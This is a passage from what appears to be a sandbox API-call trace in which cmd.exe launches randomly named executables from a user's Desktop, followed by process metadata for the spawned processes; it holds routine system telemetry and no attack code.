ftLastAccessTime.dwLowDateTime=0x78cb719f, ftLastAccessTime.dwHighDateTime=0x1d5ed52, ftLastWriteTime.dwLowDateTime=0x78cb719f, ftLastWriteTime.dwHighDateTime=0x1d5ed52, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x33447b0 [0209.851] FindClose (in: hFindFile=0x33447b0 | out: hFindFile=0x33447b0) returned 1 [0209.851] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0209.852] SetCurrentDirectoryW (lpPathName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 1 [0209.852] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\FD1HVy\\Desktop") returned 1 [0209.852] GetProcessHeap () returned 0x3340000 [0209.852] RtlFreeHeap (HeapHandle=0x3340000, Flags=0x0, BaseAddress=0x3347798) returned 1 [0209.852] GetEnvironmentStringsW () returned 0x3344c20* [0209.852] GetProcessHeap () returned 0x3340000 [0209.852] RtlAllocateHeap (HeapHandle=0x3340000, Flags=0x8, Size=0xb1a) returned 0x3346ca8 [0209.852] FreeEnvironmentStringsA (penv="=") returned 1 [0209.852] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x37d0048 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0209.852] GetProcessHeap () returned 0x3340000 [0209.853] RtlFreeHeap (HeapHandle=0x3340000, Flags=0x0, BaseAddress=0x3344770) returned 1 [0209.853] ??_V@YAXPAX@Z () returned 0x1 [0209.853] ??_V@YAXPAX@Z () returned 0x1 [0209.853] GetProcessHeap () returned 0x3340000 [0209.853] RtlAllocateHeap (HeapHandle=0x3340000, Flags=0x8, Size=0x400e) returned 0x3348db0 [0209.854] GetProcessHeap () returned 0x3340000 [0209.854] RtlAllocateHeap (HeapHandle=0x3340000, Flags=0x8, Size=0x2e) returned 0x3344770 [0209.855] GetProcessHeap () returned 0x3340000 [0209.855] RtlFreeHeap (HeapHandle=0x3340000, Flags=0x0, BaseAddress=0x3348db0) returned 1 [0209.855] GetConsoleOutputCP () returned 0x1b5 [0210.134] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf03850 | out: lpCPInfo=0xf03850) returned 1 [0210.134] GetUserDefaultLCID () returned 0x409 [0210.135] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xeff82c, cchData=8 | out: lpLCData=":") returned 2 [0210.136] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x32ffc3c, cchData=128 | out: lpLCData="0") returned 2 [0210.136] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x32ffc3c, cchData=128 | out: lpLCData="0") returned 2 [0210.136] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x32ffc3c, cchData=128 | out: lpLCData="1") returned 2 [0210.136] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xeff81c, cchData=8 | out: lpLCData="/") returned 2 [0210.136] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xeff7b8, cchData=32 | out: lpLCData="Mon") returned 4 [0210.136] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xeff778, cchData=32 | out: lpLCData="Tue") returned 4 [0210.136] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xeff738, cchData=32 | out: lpLCData="Wed") returned 4 [0210.136] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xeff6f8, cchData=32 | out: lpLCData="Thu") returned 4 [0210.137] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xeff6b8, cchData=32 | out: lpLCData="Fri") returned 4 [0210.137] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xeff678, cchData=32 | out: lpLCData="Sat") returned 4 [0210.137] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xeff638, cchData=32 | out: lpLCData="Sun") returned 4 [0210.137] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xeff80c, cchData=8 | out: lpLCData=".") returned 2 [0210.137] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xeff7f8, cchData=8 | out: lpLCData=",") returned 2 [0210.137] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0210.142] GetProcessHeap () returned 0x3340000 [0210.142] RtlAllocateHeap (HeapHandle=0x3340000, Flags=0x0, Size=0x20c) returned 0x33477d0 [0210.142] GetConsoleTitleW (in: lpConsoleTitle=0x33477d0, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\SYSTEM32\\cmd.exe") returned 0x1c [0211.005] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x73b80000 [0211.005] GetProcAddress (hModule=0x73b80000, lpProcName="CopyFileExW") returned 0x73b94330 [0211.006] GetProcAddress (hModule=0x73b80000, lpProcName="IsDebuggerPresent") returned 0x73b95930 [0211.006] GetProcAddress (hModule=0x73b80000, lpProcName="SetConsoleInputExeNameW") returned 0x74eb09d0 [0211.006] ??_V@YAXPAX@Z () returned 0x1 [0211.007] GetProcessHeap () returned 0x3340000 [0211.007] RtlAllocateHeap (HeapHandle=0x3340000, Flags=0x8, Size=0x400a) returned 0x3348db0 [0211.008] GetProcessHeap () returned 0x3340000 [0211.008] RtlFreeHeap (HeapHandle=0x3340000, Flags=0x0, BaseAddress=0x3348db0) returned 1 [0211.012] _wcsicmp (_String1="onc2pn4u4214.exe", _String2=")") returned 70 [0211.012] _wcsicmp (_String1="FOR", _String2="onc2pn4u4214.exe") returned -9 [0211.012] _wcsicmp (_String1="FOR/?", _String2="onc2pn4u4214.exe") returned -9 [0211.012] _wcsicmp (_String1="IF", _String2="onc2pn4u4214.exe") returned -6 [0211.012] _wcsicmp (_String1="IF/?", _String2="onc2pn4u4214.exe") returned -6 [0211.012] _wcsicmp (_String1="REM", _String2="onc2pn4u4214.exe") returned 3 [0211.012] _wcsicmp (_String1="REM/?", _String2="onc2pn4u4214.exe") returned 3 [0211.012] GetProcessHeap () returned 0x3340000 [0211.012] RtlAllocateHeap (HeapHandle=0x3340000, Flags=0x8, Size=0x58) returned 0x33479e8 [0211.012] GetProcessHeap () returned 0x3340000 [0211.012] RtlAllocateHeap (HeapHandle=0x3340000, Flags=0x8, Size=0x2a) returned 0x33447f0 [0211.015] GetConsoleTitleW (in: lpConsoleTitle=0x32ffb30, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\SYSTEM32\\cmd.exe") returned 0x1c [0211.548] malloc (_Size=0xffce) returned 0x37e2600 [0211.549] ??_V@YAXPAX@Z () returned 0x32ff8bc [0211.550] malloc (_Size=0xffce) returned 0x37f25d8 [0211.551] ??_V@YAXPAX@Z () returned 0x32ff674 [0211.554] GetFileAttributesW (lpFileName="onc2pn4u4214.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\onc2pn4u4214.exe")) returned 0x20 [0211.554] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="DIR") returned 11 [0211.554] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="ERASE") returned 10 [0211.554] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="DEL") returned 11 [0211.554] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="TYPE") returned -5 [0211.554] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="COPY") returned 12 [0211.554] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="CD") returned 12 [0211.554] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="CHDIR") returned 12 [0211.555] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="RENAME") returned -3 [0211.555] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="REN") returned -3 [0211.555] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="ECHO") returned 10 [0211.555] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="SET") returned -4 [0211.555] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="PAUSE") returned -1 [0211.555] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="DATE") returned 11 [0211.555] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="TIME") returned -5 [0211.555] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="PROMPT") returned -1 [0211.555] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="MD") returned 2 [0211.555] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="MKDIR") returned 2 [0211.555] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="RD") returned -3 [0211.555] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="RMDIR") returned -3 [0211.555] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="PATH") returned -1 [0211.556] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="GOTO") returned 8 [0211.556] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="SHIFT") returned -4 [0211.556] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="CLS") returned 12 [0211.556] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="CALL") returned 12 [0211.556] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="VERIFY") returned -7 [0211.556] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="VER") returned -7 [0211.556] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="VOL") returned -7 [0211.556] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="EXIT") returned 10 [0211.556] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="SETLOCAL") returned -4 [0211.556] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="ENDLOCAL") returned 10 [0211.556] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="TITLE") returned -5 [0211.557] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="START") returned -4 [0211.557] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="DPATH") returned 11 [0211.557] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="KEYS") returned 4 [0211.557] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="MOVE") returned 2 [0211.557] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="PUSHD") returned -1 [0211.557] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="POPD") returned -1 [0211.557] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="ASSOC") returned 14 [0211.557] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="FTYPE") returned 9 [0211.557] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="BREAK") returned 13 [0211.557] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="COLOR") returned 12 [0211.557] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="MKLINK") returned 2 [0211.557] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="DIR") returned 11 [0211.557] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="ERASE") returned 10 [0211.558] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="DEL") returned 11 [0211.558] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="TYPE") returned -5 [0211.558] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="COPY") returned 12 [0211.558] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="CD") returned 12 [0211.558] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="CHDIR") returned 12 [0211.558] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="RENAME") returned -3 [0211.558] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="REN") returned -3 [0211.558] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="ECHO") returned 10 [0211.558] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="SET") returned -4 [0211.558] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="PAUSE") returned -1 [0211.558] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="DATE") returned 11 [0211.558] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="TIME") returned -5 [0211.558] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="PROMPT") returned -1 [0211.559] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="MD") returned 2 [0211.559] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="MKDIR") returned 2 [0211.559] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="RD") returned -3 [0211.559] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="RMDIR") returned -3 [0211.559] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="PATH") returned -1 [0211.559] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="GOTO") returned 8 [0211.559] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="SHIFT") returned -4 [0211.559] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="CLS") returned 12 [0211.559] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="CALL") returned 12 [0211.559] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="VERIFY") returned -7 [0211.559] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="VER") returned -7 [0211.559] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="VOL") returned -7 [0211.559] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="EXIT") returned 10 [0211.560] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="SETLOCAL") returned -4 [0211.560] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="ENDLOCAL") returned 10 [0211.560] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="TITLE") returned -5 [0211.560] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="START") returned -4 [0211.560] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="DPATH") returned 11 [0211.560] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="KEYS") returned 4 [0211.560] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="MOVE") returned 2 [0211.560] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="PUSHD") returned -1 [0211.560] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="POPD") returned -1 [0211.560] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="ASSOC") returned 14 [0211.560] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="FTYPE") returned 9 [0211.560] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="BREAK") returned 13 [0211.560] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="COLOR") returned 12 [0211.560] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="MKLINK") returned 2 [0211.561] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="FOR") returned 9 [0211.561] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="IF") returned 6 [0211.561] _wcsicmp (_String1="onc2pn4u4214.exe", _String2="REM") returned -3 [0211.564] ??_V@YAXPAX@Z () returned 0x1 [0211.564] GetProcessHeap () returned 0x3340000 [0211.564] RtlAllocateHeap (HeapHandle=0x3340000, Flags=0x8, Size=0xffd6) returned 0x3348db0 [0211.566] GetProcessHeap () returned 0x3340000 [0211.566] RtlAllocateHeap (HeapHandle=0x3340000, Flags=0x8, Size=0x2a) returned 0x3347a48 [0211.566] _wcsnicmp (_String1="onc2", _String2="cmd ", _MaxCount=0x4) returned 12 [0211.567] malloc (_Size=0xffce) returned 0x37f25d8 [0211.567] ??_V@YAXPAX@Z () returned 0x32ff3f4 [0211.568] GetProcessHeap () returned 0x3340000 [0211.568] RtlAllocateHeap (HeapHandle=0x3340000, Flags=0x8, Size=0x1ffa4) returned 0x3358d90 [0211.572] SetErrorMode (uMode=0x0) returned 0x0 [0211.572] SetErrorMode (uMode=0x1) returned 0x0 [0211.572] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x3358d98, lpFilePart=0x32ff414 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x32ff414*="Desktop") returned 0x17 [0211.573] SetErrorMode (uMode=0x0) returned 0x1 [0211.573] GetProcessHeap () returned 0x3340000 [0211.573] RtlReAllocateHeap (Heap=0x3340000, Flags=0x0, Ptr=0x3358d90, Size=0x5a) returned 0x3358d90 [0211.573] GetProcessHeap () returned 0x3340000 [0211.573] RtlSizeHeap (HeapHandle=0x3340000, Flags=0x0, MemoryPointer=0x3358d90) returned 0x5a [0211.573] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xeff840, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0211.573] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0211.573] GetProcessHeap () returned 0x3340000 [0211.573] RtlAllocateHeap (HeapHandle=0x3340000, Flags=0x8, Size=0x1b4) returned 0x3347a80 [0211.574] GetProcessHeap () returned 0x3340000 [0211.574] RtlAllocateHeap (HeapHandle=0x3340000, Flags=0x8, Size=0x360) returned 0x3347c40 [0211.590] GetProcessHeap () returned 0x3340000 [0211.590] RtlReAllocateHeap (Heap=0x3340000, Flags=0x0, Ptr=0x3347c40, Size=0x1b6) returned 0x3347c40 [0211.590] GetProcessHeap () returned 0x3340000 [0211.590] RtlSizeHeap (HeapHandle=0x3340000, Flags=0x0, MemoryPointer=0x3347c40) returned 0x1b6 [0211.590] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xeff840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0211.590] GetProcessHeap () returned 0x3340000 [0211.590] RtlAllocateHeap (HeapHandle=0x3340000, Flags=0x8, Size=0xe0) returned 0x3347e00 [0211.591] GetProcessHeap () returned 0x3340000 [0211.591] RtlReAllocateHeap (Heap=0x3340000, Flags=0x0, Ptr=0x3347e00, Size=0x76) returned 0x3347e00 [0211.591] GetProcessHeap () returned 0x3340000 [0211.591] RtlSizeHeap (HeapHandle=0x3340000, Flags=0x0, MemoryPointer=0x3347e00) returned 0x76 [0211.591] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0211.592] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\onc2pn4u4214.exe", fInfoLevelId=0x1, lpFindFileData=0x32ff1c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32ff1c0) returned 0x3347e80 [0211.592] GetProcessHeap () returned 0x3340000 [0211.592] RtlAllocateHeap (HeapHandle=0x3340000, Flags=0x0, Size=0x14) returned 0x3344700 [0211.592] FindClose (in: hFindFile=0x3347e80 | out: hFindFile=0x3347e80) returned 1 [0211.593] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0211.593] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0211.593] ??_V@YAXPAX@Z () returned 0x1 [0211.593] GetConsoleTitleW (in: lpConsoleTitle=0x32ff6a4, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\SYSTEM32\\cmd.exe") returned 0x1c [0211.881] InitializeProcThreadAttributeList (in: lpAttributeList=0x32ff5d0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x32ff5bc | out: lpAttributeList=0x32ff5d0, lpSize=0x32ff5bc) returned 1 [0211.881] UpdateProcThreadAttribute (in: lpAttributeList=0x32ff5d0, dwFlags=0x0, Attribute=0x60001, lpValue=0x32ff5b8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x32ff5d0, lpPreviousValue=0x0) returned 1 [0211.882] GetStartupInfoW (in: lpStartupInfo=0x32ff608 | out: lpStartupInfo=0x32ff608*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x8c, hStdOutput=0x3d8, hStdError=0x480)) [0211.882] GetProcessHeap () returned 0x3340000 [0211.882] RtlAllocateHeap (HeapHandle=0x3340000, Flags=0x8, Size=0x18) returned 0x3347e80 [0211.882] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0211.882] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0211.882] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0211.882] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0211.882] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0211.883] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0211.883] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0211.883] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0211.883] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0211.883] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0211.883] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0211.883] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0211.883] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0211.883] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0211.883] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0211.883] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0211.883] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0211.884] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0211.884] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0211.884] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0211.884] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0211.884] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0211.884] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0211.884] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0211.884] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0211.884] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0211.884] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0211.884] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0211.885] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0211.885] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0211.885] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0211.885] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0211.885] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0211.885] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0211.885] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0211.885] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0211.885] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0211.885] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0211.885] GetProcessHeap () returned 0x3340000 [0211.885] RtlFreeHeap (HeapHandle=0x3340000, Flags=0x0, BaseAddress=0x3347e80) returned 1 [0211.885] GetProcessHeap () returned 0x3340000 [0211.886] RtlAllocateHeap (HeapHandle=0x3340000, Flags=0x8, Size=0xa) returned 0x3347e80 [0211.886] lstrcmpW (lpString1="\\onc2pn4u4214.exe", lpString2="\\XCOPY.EXE") returned -1 [0211.889] _get_osfhandle (_FileHandle=1) returned 0x3d8 [0211.889] SetConsoleMode (hConsoleHandle=0x3d8, dwMode=0x0) returned 0 [0211.889] _get_osfhandle (_FileHandle=0) returned 0x8c [0211.889] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1f7) returned 1 [0212.319] CreateProcessW (in: lpApplicationName="C:\\Users\\FD1HVy\\Desktop\\onc2pn4u4214.exe", lpCommandLine="onc2pn4u4214.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x32ff558*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="onc2pn4u4214.exe", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x32ff5a4 | out: lpCommandLine="onc2pn4u4214.exe", lpProcessInformation=0x32ff5a4*(hProcess=0xd8, hThread=0xd4, dwProcessId=0xd6c, dwThreadId=0x4ec)) returned 1 [0212.510] CloseHandle (hObject=0xd4) returned 1 [0212.510] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0212.510] GetProcessHeap () returned 0x3340000 [0212.510] RtlFreeHeap (HeapHandle=0x3340000, Flags=0x0, BaseAddress=0x3346ca8) returned 1 [0212.510] GetEnvironmentStringsW () returned 0x3346ca8* [0212.511] GetProcessHeap () returned 0x3340000 [0212.511] RtlAllocateHeap (HeapHandle=0x3340000, Flags=0x8, Size=0xb1a) returned 0x3344c20 [0212.511] FreeEnvironmentStringsA (penv="=") returned 1 [0212.511] WaitForSingleObject (hHandle=0xd8, dwMilliseconds=0xffffffff) Thread: id = 160 os_tid = 0x13d4 Process: id = "15" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x203ad000" os_pid = "0xc64" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "13" os_parent_pid = "0x9d0" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f8ee" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 151 os_tid = 0xfcc Thread: id = 152 os_tid = 0x1164 Thread: id = 155 os_tid = 0x10cc Process: id = "16" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x20402000" os_pid = "0x1154" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "14" os_parent_pid = "0xfac" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f8ee" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 153 os_tid = 0x10b8 Thread: id = 154 os_tid = 0x137c Thread: id = 157 os_tid = 0x13fc Process: id = "17" image_name = "qq3d1t429055.exe" filename = "c:\\users\\fd1hvy\\desktop\\qq3d1t429055.exe" page_root = "0x2173f000" os_pid = "0x118c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "13" os_parent_pid = "0x9d0" cmd_line = "qq3d1t429055.exe" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], 